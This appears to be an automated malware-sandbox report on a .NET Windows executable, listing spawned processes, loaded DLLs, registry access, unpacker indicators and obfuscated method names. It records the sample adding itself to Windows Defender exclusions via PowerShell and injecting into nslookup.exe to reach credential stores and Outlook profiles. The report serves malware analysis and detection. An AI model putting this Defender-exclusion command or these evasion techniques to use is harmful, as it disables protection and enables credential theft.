Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process created: C:\Users\user\Desktop\A4mmSHCUi2.exe "C:\Users\user\Desktop\A4mmSHCUi2.exe"	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\nslookup.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: A4mmSHCUi2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: A4mmSHCUi2.exe

Static file information: File size 1049600 > 1048576

Source: A4mmSHCUi2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: nslookup.pdb source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001740000.00000004.00000020.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001728000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.0000000000958000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nslookup.pdbGCTL source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001740000.00000004.00000020.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001728000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.0000000000958000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wioTZtEQwu.exe, 0000000A.00000000.1906199716.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, wioTZtEQwu.exe, 0000000C.00000000.2054498010.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: A4mmSHCUi2.exe, 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1984134279.0000000003421000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1987692730.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: A4mmSHCUi2.exe, A4mmSHCUi2.exe, 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1984134279.0000000003421000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1987692730.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.A4mmSHCUi2.exe.3a96000.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	.Net Code: m3kJ8hUmj7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	.Net Code: m3kJ8hUmj7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	.Net Code: m3kJ8hUmj7 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_004140FD push ecx; retf	5_2_00414106
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00412226 push 00000020h; retf	5_2_0041222D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0042E2D3 push edi; retf	5_2_0042E2D9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00403290 push eax; ret	5_2_00403292
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0041837F push es; ret	5_2_00418388
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0041A569 pushfd ; iretd	5_2_0041A56A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00404E51 push ebx; ret	5_2_00404E52
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_00417E85 push esp; iretd	5_2_00417E86
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_0041A71E push edi; ret	5_2_0041A71F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B8225F pushad ; ret	5_2_01B827F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B827FA pushad ; ret	5_2_01B827F9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB09AD push ecx; mov dword ptr [esp], ecx	5_2_01BB09B6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B8283D push eax; iretd	5_2_01B82858
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01B81368 push eax; iretd	5_2_01B81369
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0378225F pushad ; ret	11_2_037827F9
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037827FA pushad ; ret	11_2_037827F9
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_037B09AD push ecx; mov dword ptr [esp], ecx	11_2_037B09B6
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_0378283D push eax; iretd	11_2_03782858
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_03781350 push eax; iretd	11_2_03781369
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB4BF2 push esp; iretd	11_2_02EB4BF3
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EBEE10 push cs; ret	11_2_02EBEF6D
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EAEF93 push 00000020h; retf	11_2_02EAEF9A
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB72D6 pushfd ; iretd	11_2_02EB72D7
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB50EC push es; ret	11_2_02EB50F5
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02ECB040 push edi; retf	11_2_02ECB046
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EBB67F push eax; ret	11_2_02EBB682
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EB748B push edi; ret	11_2_02EB748C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EA1BBE push ebx; ret	11_2_02EA1BBF
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_02EBBD7C push ebp; iretd	11_2_02EBBD7D
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_036371EA push edx; iretd	11_2_036371EB
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 11_2_036346BE push eax; ret	11_2_036346BF

Source: A4mmSHCUi2.exe

Static PE information: section name: .text entropy: 7.091682077929142

Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, vWcwPHRad2Roxs8yNJV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MZSlc68IIm', 'XEflZW4lA3', 'Wm0lLN0Xvd', 'RsBlNoeE2F', 'A8flxaI0EO', 'Kq3lW8Qc36', 'CwJlpAEI72'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, oSwEsso09Mkcg65DAT.cs	High entropy of concatenated method names: 'vnvKrhxCZy', 'LHnKBtCQB7', 'ToString', 'XWTKeTkNFO', 'kI0K4bABow', 'mnLKYt9r4O', 'aToKTG5m9I', 'FEiKixhDJX', 'DDFK3Pd9im', 'VeLK1P4VeD'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, uq3WgDqhO9XZMXWfuk.cs	High entropy of concatenated method names: 'WSvXbmSxEP', 'qhtXO6YMl7', 'HQ1XJ7ZSxE', 'dq2XeF8wCB', 'FU5X4lW5lR', 'YPqXTVTc5D', 'sn1XihwAeY', 'nQmnpRqEkj', 'wv9nU5sXMP', 'XBungMc005'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, NLhbhxF9xrwG1riJEW.cs	High entropy of concatenated method names: 'Sgs8APCH5', 'pQsRu5B6s', 'KEI9JxtyU', 'MhYkbeyAr', 'YHZDMgLAL', 'rMxuhQSZV', 'Xww4TclmrhWVMjSR2i', 'cdyBKeSORAs2LWbwX2', 'b0bnS2oGp', 'WvOlFN9sv'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	High entropy of concatenated method names: 'HXS4cvnpYs', 'rYd4ZKadx8', 'W3K4Lyp7YM', 'ugG4NfUf2A', 'g2A4xZ3BUB', 'sW84WhcPgx', 'k9v4pZNTp2', 'VQr4UYj9ri', 'MS94g73UOK', 'P8J4qShfdO'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, IwmQcWygeY281oMpMf.cs	High entropy of concatenated method names: 'lKtTtI56cf', 'dduTkD2P10', 'nxBY27UmLv', 'LcOYvNO7p2', 'sKjYM1ljec', 'lILYEOcUNJ', 'YdOY0hbsKB', 'QljYoliTXp', 'GjqYjKrKVL', 'AuIYakfAgm'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, BNQlZFkw6popO7KXBi.cs	High entropy of concatenated method names: 'pMKnedkerY', 'N42n40bprS', 'Qm5nYYTHYT', 'tn0nTr9lD3', 'VAUniteYUB', 'T2sn3tGbwi', 'H0Un1PVnS8', 'PvHnd3vDWO', 'p02nr7DddV', 'HS0nB1qNVC'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, btCCW57r3XgeNcUUr6.cs	High entropy of concatenated method names: 'th63eXjMh9', 'R593YvgVYJ', 'xjD3i6HLWY', 'w1RiqABSJV', 'I4qizuRsU3', 'aZr36t5ua1', 'zVn3bwqCUT', 'zhN3mqNlqK', 'MyP3Onc535', 'b9D3JjB9Ts'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, vshqB1GWuAvYC4MRcm.cs	High entropy of concatenated method names: 'YQmy7gt7Os', 'R56yD44xC8', 'C4RyChnLYR', 'oxRy5OrTFA', 'OZJyvSj9XS', 'lN3yMuVy8S', 'Q8gy0KV3PK', 'CJDyoMvtr7', 'exjyauQPuK', 'P9vyGWM8kN'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, iILhRxLFrUQAgKWxI5.cs	High entropy of concatenated method names: 'xQ3KU1ER8S', 'fRVKqtAUdc', 'Rjon6lMemS', 'NtnnbQwQpk', 'VbKKGa7thi', 'WqMKst76vb', 'OXaKFNuIFl', 'qOHKcovTtd', 'oHvKZaSlTc', 'sdoKLZbFT2'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	High entropy of concatenated method names: 'EuPOHmxN0f', 'kUtOeb0Zn7', 'PbkO4e4jin', 'wR5OYqbXcI', 'lo4OTVYygh', 'hlFOiVrnqh', 't8tO3k169b', 'h6KO1keODA', 'RdZOdfJ79g', 'iuIOry3Exx'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, yktdnGO5UfkLa4JLIX.cs	High entropy of concatenated method names: 'LhE3I6JWjy', 'TYu3wVW6Jw', 'UmV38tSYFq', 'Hgg3RaS3cL', 'lsH3t1YoXe', 'JWT39JIdGw', 'PnD3kJoQIb', 'wkN37nECAb', 'v4J3DwQBkM', 'Vsi3urjcLK'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, syVEwOKhXLXNiFylnc.cs	High entropy of concatenated method names: 'U6DiSpWYqh', 'dubiIaOG8t', 'v8Ni8g4cw3', 'FJQiREc65M', 'NSLi927G1a', 'K17ik7KL4S', 'VaTiDZTNPP', 'k3qiuqqiug', 'P6W9iv0AD8cWHnrj21d', 'mlwjW70bX5GOqQxCXdx'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, T6edl0iKcvg5atoN1X.cs	High entropy of concatenated method names: 'JquiHKkZJl', 'UVmi4WOJqM', 'oeGiTmgCk9', 'DJii3F6ZDd', 'sPqi1hAi1v', 'N3NTxkVEUJ', 'Tf6TW5e6RZ', 'ou2Tpu1I6I', 'nA2TUpQMJ8', 'hFaTgD6GUg'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, nCrxaeTTomdUZHeaOp.cs	High entropy of concatenated method names: 'Dispose', 'NCKbgbXZnk', 'qv7m5DwaUf', 'XtuAA9JrMS', 'X5ybqJGqsr', 'lh0bz3OrJ8', 'ProcessDialogKey', 'PV3m6F7lsL', 'Od4mbwCiAF', 'aVsmmHJRw8'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, sw82b7RU8NVLIVEc3Ly.cs	High entropy of concatenated method names: 'N6rXINJ0Ah', 'tF0XwMQkGP', 'HCLX8c1uGH', 'sywXRlYitF', 'UiaXtW51nP', 'iCqX9E1Vcq', 'BRcXkd3Q5u', 'hQ3X77iaeh', 'BrcXDvj7VL', 'AbGXuv5LXm'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, JnwIHAxNPMc7kALJ30.cs	High entropy of concatenated method names: 'VwAb3be7V7', 'mGJb1aTE7b', 'GmUbrWSLa7', 'k9PbB1Pq7P', 'jmubQI5o4D', 'EXcbPnOuYc', 'JRw949wsBsbLAEVpmV', 'nbk1GhfHFmnhTZu2sC', 'm7dbbjGTUs', 'T9ybOU0eGt'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, tuVOPcsfv635U8RtuQ.cs	High entropy of concatenated method names: 'FeDYR8emxi', 'D8QY9gitMr', 'NPSY7r0HSG', 'hhmYDsj9dE', 'QLtYQKAPMW', 'Mv1YP6TWuS', 'sd3YK1ZgoD', 'QuZYnuBKkA', 'X26YXxGXpS', 'FljYlKlpYM'
